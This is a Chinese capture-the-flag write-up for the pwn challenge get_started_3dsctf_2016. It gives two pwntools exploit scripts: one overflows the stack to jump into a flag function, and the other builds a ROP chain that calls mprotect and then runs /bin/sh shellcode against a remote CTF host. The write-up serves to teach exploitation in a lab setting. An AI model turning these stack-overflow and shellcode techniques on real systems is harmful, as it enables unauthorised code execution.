题外:这道题不是很难,但是却难住了我很久。主要是在IDA中查看反编译出的伪代码时双击了一下gets()函数,结果进入gets函数内部,我当时就懵了,误以为这是一个自定义函数,但是自定义函数应该应该不能与已有的库函数同名啊。虽然有此疑问,我没有深究,而是老老实实分析反汇编出来的伪代码,结果发现函数层层嵌套,根本分析不完。最后我不得以去网上看了别人的题解,发现根本不用管这些。题最后做出来了,但还是不明白为啥会有这么一大串代码。
----------------------------------------------------------------------------------------------------
解法一:
先分析题目的二进制文件
可以看出这是32位程序,没有看cannary和PIE保护,接下来把程序放入IDA中看看。
程序很简单,存在明显的栈溢出。细心的小伙伴还可以发现程序直接给了一个拿flag的函数,如下:
但是这个函数中有if条件限制,不好直接跳转到这个函数。这个时候就可以选择直接跳转到if语句块里,从而绕过if的检查。这么的做的弊端是导致栈不平衡,执行完这个函数后程序会崩溃,不过这之前我们已经拿到flag了,所以这题是没有什么关系的。最后exp如下:
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
elf = ELF('./get_started_3dsctf_2016')
sh = elf.process()
get_flag = 0x080489b8
payload_01 = 'A'*0x38 + p32(get_flag)
gdb.attach(sh)
sh.sendline(payload_01)
sh.interactive('countfatcode> ')
这样写在本机上是能跑的,但是打远程的时候汇出错,我也不知道为什么。
解法二:
细心的小伙伴可以发现题目里有mprotect函数,这个函数可以改变程序内存空间的读写执行权限。具体的用法如下:
int mprotect(const void *start, size_t len, int prot); 参数start表示开始的内存地址,len是要操作的内存大小,prot表示权限
所以我们先用mrotect函数把.bss中的一部分改为可执行,用调用read函数向其中写入shellcode,最后再跳转到shellcode出执行。具体的exp如下:
from pwn import *
context(os = 'linux', arch = 'i386', log_level = 'debug')
context.terminal = ['tmux', 'splitw', '-h']
# p = process('./get_started_3dsctf_2016')
p = remote('node3.buuoj.cn', 25626)
elf = ELF('./get_started_3dsctf_2016')
mprotect_addr = 0x0806ec80
read_addr = elf.symbols['read']
pop3_addr = 0x080509a5
payload = 'A'*0x38 + p32(mprotect_addr) + p32(pop3_addr) + p32(0x080ea000) + p32(0x2000) + p32(0x7) + p32(read_addr) + p32(0x080eb000)
payload += p32(0) + p32(0x080eb000) + p32(0x100)
#gdb.attach(p)
p.sendline(payload)
sleep(1)
shellcode = asm('''
mov edx, 0
mov ecx, 0
push 0x68732f
push 0x6e69622f
mov ebx, esp
mov eax, 0xb
int 0x80
''')
p.sendline(shellcode)
p.interactive()